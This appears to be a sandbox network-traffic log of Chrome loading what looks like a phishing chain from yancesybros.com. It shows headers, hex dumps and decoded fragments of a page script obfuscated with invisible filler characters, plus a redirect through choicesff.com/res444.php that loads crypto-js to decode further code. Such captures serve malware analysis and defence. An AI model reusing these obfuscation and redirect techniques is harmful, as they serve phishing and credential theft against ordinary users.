34 57 5a 6d 59 74 50 54 35 2b 4c 6c 36 47 53 56 56 74 51 57 48 36
                                                    Data Ascii: uOCj6dzsuu7v7ubg9PTmqqr4/vbsr7WqsvT28vP1ALm8z5+2t7i5DgsJFATjAhYE9xQRDBbtFtgfEiLvJCUkHBYqKhzf3ygcKSLk6t/nJPklKCcr+P4vADIAAgYJNAQGBTkIOxAKDTwNFkRDFxpHFRUbGkwhHE1NHFMkUyYnKywpJVxcKisrX10vMTgyMiksPw8mJygpfXp4g3NTcYVzZ4OAe4VdhUiOgZFfk5STi4WZmYtPT5+Ll6GSVVtQWH6
                                                    2024-11-25 18:44:21 UTC159INData Raw: 38 75 76 71 74 37 75 37 2b 58 76 35 73 62 73 37 76 4c 72 73 4f 2f 35 2f 66 6e 53 2b 72 6a 4c 6d 37 4b 7a 74 4c 58 38 42 77 73 48 33 77 6a 4b 45 52 51 43 44 67 73 58 79 38 33 67 73 4d 66 49 79 63 6f 6a 46 68 77 54 48 79 6a 66 44 53 50 31 44 77 58 73 32 50 62 61 4d 43 38 7a 4a 50 72 4b 50 2f 33 4e 7a 69 38 74 35 2f 42 42 4e 44 6f 78 50 55 62 39 4b 30 45 55 4c 53 4d 4c 41 50 64 55 34 2f 72 37 2f 50 31 57 53 55 39 47 55 6c 73 54 58 46 35 57 4e 46 41 62 46 42 59 70 2b 47 33 36
                                                    Data Ascii: 8uvqt7u7+Xv5sbs7vLrsO/5/fnS+rjLm7KztLX8BwsH3wjKERQCDgsXy83gsMfIycojFhwTHyjfDSP1DwXs2PbaMC8zJPrKP/3Nzi8t5/BBNDoxPUb9K0EULSMLAPdU4/r7/P1WSU9GUlsTXF5WNFAbFBYp+G36


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.449777104.18.95.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:20 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/717006795:1732559173:kR_0HaZjcMZ7NfcZjqJuMDbFTXd9SIuUQzr_to9VflA/8e83c97ff9621a48/QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxav HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:21 UTC379INHTTP/1.1 404 Not Found
                                                    Date: Mon, 25 Nov 2024 18:44:21 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 7
                                                    Connection: close
                                                    cf-chl-out: FA6JQ2QziLMxHHQZjvDeyIW24h6xr74q9CU=$f8W3dU21+qTSuBbz
                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Server: cloudflare
                                                    CF-RAY: 8e83ca20af9480da-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:44:21 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                    Data Ascii: invalid


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.449779172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:22 UTC1252OUTPOST /WHF9842BVD.html HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    Content-Length: 6083
                                                    Cache-Control: max-age=0
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-full-version: "117.0.5938.132"
                                                    sec-ch-ua-arch: "x86"
                                                    sec-ch-ua-platform: "Windows"
                                                    sec-ch-ua-platform-version: "10.0.0"
                                                    sec-ch-ua-model: ""
                                                    sec-ch-ua-bitness: "64"
                                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                    Upgrade-Insecure-Requests: 1
                                                    Origin: https://yancesybros.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-User: ?1
                                                    Sec-Fetch-Dest: document
                                                    Referer: https://yancesybros.com/WHF9842BVD.html?__cf_chl_tk=Dveq2bajeb4.68juqKcEwLAC3uO_Xxj5VhibRkg9Lpo-1732560228-1.0.1.1-EQcS5msdFBnN_w.DEowher7hBFNGCCOYXT25SAX1UmY
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:22 UTC6083OUTData Raw: 66 31 35 32 66 32 30 34 33 39 61 32 36 64 32 32 39 35 34 62 32 63 39 64 33 62 64 62 37 34 34 65 37 34 30 62 34 36 31 33 34 63 30 61 30 35 62 36 66 32 34 63 37 64 61 30 38 65 65 64 37 36 30 62 3d 56 4e 33 73 78 48 77 47 37 54 39 49 6a 36 50 5f 75 49 6b 7a 42 49 73 79 53 51 35 34 70 52 54 41 34 75 32 79 71 49 6c 72 42 38 30 2d 31 37 33 32 35 36 30 32 32 38 2d 31 2e 32 2e 31 2e 31 2d 61 39 63 4f 4f 6a 58 61 63 76 4a 46 64 4c 39 39 6f 31 50 4b 37 48 74 43 63 42 35 59 30 46 51 32 6f 73 59 43 31 67 57 67 63 79 64 70 7a 72 69 71 62 4a 52 53 2e 48 51 54 49 50 53 2e 64 70 73 43 6b 51 50 32 33 66 67 33 78 62 33 5a 66 53 6f 73 47 47 46 75 34 56 38 69 41 4e 56 4f 6a 75 63 69 66 53 4a 58 57 47 65 75 44 5f 69 76 4c 4c 48 35 62 4f 48 48 64 59 79 51 46 53 78 32 38 51 58
                                                    Data Ascii: f152f20439a26d22954b2c9d3bdb744e740b46134c0a05b6f24c7da08eed760b=VN3sxHwG7T9Ij6P_uIkzBIsySQ54pRTA4u2yqIlrB80-1732560228-1.2.1.1-a9cOOjXacvJFdL99o1PK7HtCcB5Y0FQ2osYC1gWgcydpzriqbJRS.HQTIPS.dpsCkQP23fg3xb3ZfSosGGFu4V8iANVOjucifSJXWGeuD_ivLLH5bOHHdYyQFSx28QX
                                                    2024-11-25 18:44:23 UTC1152INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:23 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.yancesybros.com; Priority=High; HttpOnly; Secure; SameSite=None
                                                    Set-Cookie: cf_clearance=BykMC4YVH19jXVBD1vZm_9dQq__54HBoZInYarys1tM-1732560228-1.2.1.1-SFtIe0bMWScEvSPqnkxQ9E8TfXhK1qVPtqTCFRD7UKzmNiXsi6b7zwASMAfKIyJJzNrV2eKhtFw0WkBBGpnA6kpowXeCGzifYCUBGUO1BLeVeipwColDmbh_x83xSRMnpWErKrRqP.QtunH5HTfp_GPZQCmI2ypHTAqmSimygPgztnyf_VCKTT4LzeeM9wmWDiRuzkKS9Up0uKXyaxdl45QIn9wGxexqWGaW1LdpCDfURSY6y6n1AHu_DjerAtiEtA1ivgH.qZACFjMMf6CbN7qYGdX8JRGEhHFenSnNxJR6KcSyqSSUKf6F2_zXZvrDIbNF_mJVWeg.iv7Jid4jtzoHeZpVDUqz4sS2W_n6gxG4PLZvkLM.Z3dbEfxD2kBvmbtJPIgiDjzdQ8L2zO_tTA6HkV3bRdJpz8jeL2vopAHjxm3oevaGarg_rMzwsTLs; Path=/; Expires=Tue, 25-Nov-25 18:44:23 GMT; Domain=.yancesybros.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                    last-modified: Fri, 22 Nov 2024 18:25:43 GMT
                                                    vary: Accept-Encoding
                                                    x-powered-by: ASP.NET
                                                    x-powered-by-plesk: PleskWin
                                                    strict-transport-security: max-age=15768000; includeSubDomains
                                                    cf-cache-status: DYNAMIC
                                                    2024-11-25 18:44:23 UTC593INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 77 71 25 32 46 4b 70 62 41 6e 50 37 48 4f 73 6c 63 65 34 33 33 38 6a 56 59 5a 50 32 33 72 50 37 50 34 35 6d 4e 61 61 64 53 33 37 32 72 51 55 76 59 4b 52 53 6c 56 6f 37 49 4f 31 47 75 71 78 57 34 34 30 55 32 6d 4a 56 6c 78 4e 49 72 34 51 63 6f 31 59 77 4c 31 53 4b 66 6c 6f 42 31 64 54 76 51 41 4e 45 77 4c 61 58 33 41 55 6d 53 44 6f 4b 76 46 50 44 35 37 42 76 79 67 51 48 5a 38 7a 6d 43 63 35 78 41 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wq%2FKpbAnP7HOslce4338jVYZP23rP7P45mNaadS372rQUvYKRSlVo7IO1GuqxW440U2mJVlxNIr4Qco1YwL1SKfloB1dTvQANEwLaX3AUmSDoKvFPD57BvygQHZ8zmCc5xA%3D"}],"group":"cf-nel","max_age":604800}N
                                                    2024-11-25 18:44:23 UTC1369INData Raw: 31 64 65 61 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 21 2d 2d 20 3c 65 6d 3e 20 53 68 65 20 74 65 6e 64 65 64 20 74 6f 20 68 65 72 20 66 6c 6f 77 65 72 20 67 61 72 64 65 6e 20 77 69 74 68 20 63 61 72 65 2e 20 3c 2f 65 6d 3e 20 2d 2d 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 3e 0a 6d 6f 72 61 79 20 3d 20 27 27 3b 0a 0a 73 3d 22 22 3b 66 6f 72 28 6c 65 74 20 50 78 3d 30 3b 50 78 3c 34 2a 2a 37 3b 2b 2b 50 78 29 52 65 66 6c 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 73 65 6c 66 2c 5b 2e 2e 2e 50 78 2e 74 6f 53 74 72 69 6e 67 28 34 29 2e 70 61 64 53 74 61 72 74 28 37 29 5d 2e 6d 61 70 28 6e 3d 3e 22 e1 85 9f e1 85 a0 e3 85 a4 ef be a0 22 5b 2b 6e 5d
                                                    Data Ascii: 1dea<html><head><meta charset="UTF-8">... <em> She tended to her flower garden with care. </em> --></head><body><script>moray = '';s="";for(let Px=0;Px<4**7;++Px)Reflect.defineProperty(self,[...Px.toString(4).padStart(7)].map(n=>""[+n]
                                                    2024-11-25 18:44:23 UTC1369INData Raw: e3 85 a4 ef be a0 e1 85 9f e1 85 a0 3b e1 85 a0 e3 85 a4 e3 85 a4 e1 85 9f e3 85 a4 ef be a0 e1 85 9f 3b e1 85 a0 e3 85 a4 e1 85 9f e3 85 a4 ef be a0 e1 85 9f e1 85 9f 3b e1 85 a0 e3 85 a4 e1 85 9f e3 85 a4 e3 85 a4 ef be a0 e1 85 9f 3b e1 85 a0 e3 85 a4 e1 85 9f e3 85 a4 ef be a0 e1 85 9f e1 85 a0 3b e1 85 a0 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e1 85 9f 3b e1 85 a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e1 85 9f e3 85 a4 3b e1 85 a0 e1 85 a0 e3 85 a4 e1 85 9f ef be a0 e1 85 a0 e1 85 a0 3b e1 85 a0 e3 85 a4 e1 85 a0 e1 85 9f e3 85 a4 ef be a0 e1 85 9f 3b e1 85 a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e1 85 9f e3 85 a4 3b e1 85 a0 e1 85 a0 e3 85 a4 e1 85 9f ef be a0 e1 85 a0 e1 85 9f 3b e1 85 a0 e3 85 a4 ef be a0 e1 85 9f e3 85 a4 ef be a0 e1 85 9f 3b
                                                    Data Ascii: ;;;;;;;;;;;;
                                                    2024-11-25 18:44:23 UTC1369INData Raw: a4 ef be a0 e1 85 9f 3b e1 85 a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e1 85 a0 e1 85 a0 3b e1 85 a0 e1 85 a0 e3 85 a4 e1 85 9f ef be a0 e1 85 a0 e1 85 a0 3b e1 85 a0 e3 85 a4 e1 85 9f e3 85 a4 e3 85 a4 ef be a0 e1 85 9f 3b e1 85 a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e1 85 a0 e1 85 9f 3b e1 85 a0 e1 85 a0 e3 85 a4 e1 85 9f ef be a0 e1 85 a0 e1 85 a0 3b e1 85 a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e1 85 9f 3b e1 85 9f e1 85 a0 e3 85 a4 e3 85 a4 e1 85 9f e3 85 a4 e3 85 a4 3b e1 85 a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e1 85 a0 e1 85 9f 3b e1 85 a0 e1 85 a0 e3 85 a4 e1 85 9f ef be a0 e1 85 a0 e1 85 a0 3b e1 85 a0 e3 85 a4 e1 85 9f e3 85 a4 e3 85 a4 ef be a0 e1 85 9f 3b e1 85 a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e1 85 a0 e1 85 9f 3b e1 85 a0 e1 85
                                                    Data Ascii: ;;;;;;;;;;;;
                                                    2024-11-25 18:44:23 UTC1369INData Raw: 85 a4 3b e1 85 a0 e1 85 a0 e3 85 a4 e1 85 9f ef be a0 e1 85 a0 e1 85 a0 3b e1 85 a0 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e1 85 9f 3b e1 85 a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e1 85 9f e3 85 a4 3b e1 85 a0 e1 85 a0 e3 85 a4 e1 85 9f ef be a0 e1 85 a0 e1 85 a0 3b e1 85 a0 e3 85 a4 e1 85 9f e1 85 9f e3 85 a4 ef be a0 e1 85 9f 3b e1 85 9f e1 85 a0 e3 85 a4 e3 85 a4 e1 85 9f e3 85 a4 e3 85 a4 3b e1 85 a0 e3 85 a4 e1 85 9f e3 85 a4 ef be a0 e1 85 9f e1 85 9f 3b e1 85 a0 e3 85 a4 e1 85 a0 e1 85 9f e3 85 a4 ef be a0 e1 85 9f 3b e1 85 a0 e3 85 a4 e3 85 a4 e1 85 9f ef be a0 e1 85 a0 e1 85 a0 3b e1 85 a0 e1 85 a0 e3 85 a4 e1 85 9f ef be a0 e1 85 9f e1 85 a0 3b e1 85 a0 e3 85 a4 e1 85 9f e1 85 9f ef be a0 e3 85 a4 e1 85 a0 3b e1 85 a0 e1 85 a0 e3 85 a4 e1
                                                    Data Ascii: ;;;;;;;;;;;;
                                                    2024-11-25 18:44:23 UTC1369INData Raw: a0 e1 85 a0 e1 85 9f ef be a0 e3 85 a4 ef be a0 e3 85 a4 3b ef be a0 e1 85 a0 ef be a0 e1 85 a0 e3 85 a4 e3 85 a4 e1 85 a0 3b ef be a0 e1 85 9f e1 85 9f ef be a0 ef be a0 e1 85 a0 ef be a0 3b ef be a0 e1 85 a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 3b ef be a0 e1 85 9f e3 85 a4 e1 85 9f e3 85 a4 e1 85 9f e1 85 9f 3b e1 85 a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 e1 85 9f e1 85 9f 3b ef be a0 e1 85 9f e1 85 9f ef be a0 ef be a0 e1 85 9f e3 85 a4 3b ef be a0 e1 85 9f e1 85 a0 ef be a0 ef be a0 e1 85 a0 e1 85 9f 3b ef be a0 e1 85 a0 e1 85 9f ef be a0 e3 85 a4 e1 85 9f ef be a0 3b ef be a0 e1 85 9f ef be a0 e1 85 a0 e3 85 a4 ef be a0 ef be a0 3b ef be a0 ef be a0 e1 85 9f e1 85 9f e3 85 a4 ef be a0 e3 85 a4 3b ef be a0 e1 85 9f e3 85 a4 e1 85 a0 e3 85 a4
                                                    Data Ascii: ;;;;;;;;;;;
                                                    2024-11-25 18:44:23 UTC821INData Raw: 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 65 38 33 63 61 32 62 39 64 32 35 38 63 31 35 27 2c 74 3a 27 4d 54 63 7a 4d 6a 55 32 4d 44 49 32 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 61 2e 6e 6f 6e 63 65 3d 27 27 3b 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61
                                                    Data Ascii: window.__CF$cv$params={r:'8e83ca2b9d258c15',t:'MTczMjU2MDI2My4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTa
                                                    2024-11-25 18:44:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.449781172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:24 UTC588OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/121176288:1732559265:7lJ7n7BdOJx3cf64Km5o6XhhTjh1yazfNFmmaS1TOb0/8e83c9569b4eefa7/NVxlqQ0CuOO_mq_ADX6BzRNv15dryg_MCjBHsRZiF_M-1732560228-1.2.1.1-BSHpMKKlNjDcEJtMM5Iqnf.JCyWX7aLd0e6uY.qTM_J3gynsL2deklactUUpBCnz HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:24 UTC902INHTTP/1.1 404 Not Found
                                                    Date: Mon, 25 Nov 2024 18:44:24 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 7
                                                    Connection: close
                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    cf-chl-out: XxO7bkbYo7cJHR0ukY/SVoeZl5ZodW66XcE=$d3J0M89Qd/JqivxH
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2FBxDtn03FYeX6svEevnC2MFPFVVNbc39XbEHrn4zfxtb24FzPVrRT17fZxDGj4YLQ5lrvgRHRi%2FtaXRu%2BRdXGZLgRCXJEAL1axbi%2BFBEYSuud%2BVAqJ%2FNFWEWAlg8R6TNCI%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e83ca33996c8ca2-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=13747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1166&delivery_rate=1458541&cwnd=252&unsent_bytes=0&cid=5b58afd9f5c42c12&ts=506&x=0"
                                                    2024-11-25 18:44:24 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                    Data Ascii: invalid


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.44978269.49.245.1724432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:25 UTC685OUTGET /res444.php?2-68747470733a2f2f4e4c2e6e73696369756d62652e636f6d2f615871725148742f-moray HTTP/1.1
                                                    Host: choicesff.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Referer: https://yancesybros.com/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:25 UTC196INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:24 GMT
                                                    Server: Apache
                                                    Access-Control-Allow-Origin: *
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/javascript;charset=UTF-8
                                                    2024-11-25 18:44:25 UTC1979INData Raw: 37 61 66 0d 0a 20 20 20 20 76 61 72 20 6f 70 4d 42 43 6a 71 6e 65 65 4f 54 44 71 62 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 6f 70 4d 42 43 6a 71 6e 65 65 4f 54 44 71 62 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 6f 70 4d 42 43 6a 71 6e 65 65 4f 54 44 71 62 6f 29 3b 0d 0a 6f 70 4d 42 43 6a 71 6e 65 65 4f 54 44 71 62 6f 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                    Data Ascii: 7af var opMBCjqneeOTDqbo = document.createElement("script");opMBCjqneeOTDqbo.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(opMBCjqneeOTDqbo);opMBCjqneeOTDqbo.onload=function()


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.449780172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:25 UTC1060OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cookie: cf_clearance=BykMC4YVH19jXVBD1vZm_9dQq__54HBoZInYarys1tM-1732560228-1.2.1.1-SFtIe0bMWScEvSPqnkxQ9E8TfXhK1qVPtqTCFRD7UKzmNiXsi6b7zwASMAfKIyJJzNrV2eKhtFw0WkBBGpnA6kpowXeCGzifYCUBGUO1BLeVeipwColDmbh_x83xSRMnpWErKrRqP.QtunH5HTfp_GPZQCmI2ypHTAqmSimygPgztnyf_VCKTT4LzeeM9wmWDiRuzkKS9Up0uKXyaxdl45QIn9wGxexqWGaW1LdpCDfURSY6y6n1AHu_DjerAtiEtA1ivgH.qZACFjMMf6CbN7qYGdX8JRGEhHFenSnNxJR6KcSyqSSUKf6F2_zXZvrDIbNF_mJVWeg.iv7Jid4jtzoHeZpVDUqz4sS2W_n6gxG4PLZvkLM.Z3dbEfxD2kBvmbtJPIgiDjzdQ8L2zO_tTA6HkV3bRdJpz8jeL2vopAHjxm3oevaGarg_rMzwsTLs
                                                    2024-11-25 18:44:25 UTC895INHTTP/1.1 302 Found
                                                    Date: Mon, 25 Nov 2024 18:44:25 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js?
                                                    cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                    access-control-allow-origin: *
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=upckcmTwHNyvU%2F8U4xVrvRQQlaYkr02y05u%2FYkM6DrtSLrfZTX%2BRtWYKiiPu6skREikTloUYWMvKwIkLuGW%2BTMVPkP7Yd%2FCz9dOac7oy18BaYUes7%2BiigYsWs3Ir8mM6Xeg%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e83ca3ceeb28cb4-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1888&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1638&delivery_rate=1499743&cwnd=182&unsent_bytes=0&cid=60774c2206fda349&ts=3030&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.449783104.17.25.144432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:26 UTC561OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                    Host: cdnjs.cloudflare.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Referer: https://yancesybros.com/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:27 UTC958INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:27 GMT
                                                    Content-Type: application/javascript; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    Cache-Control: public, max-age=30672000
                                                    ETag: W/"5eb03e2d-bb78"
                                                    Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                    cf-cdnjs-via: cfworker/kv
                                                    Cross-Origin-Resource-Policy: cross-origin
                                                    Timing-Allow-Origin: *
                                                    X-Content-Type-Options: nosniff
                                                    CF-Cache-Status: HIT
                                                    Age: 389014
                                                    Expires: Sat, 15 Nov 2025 18:44:27 GMT
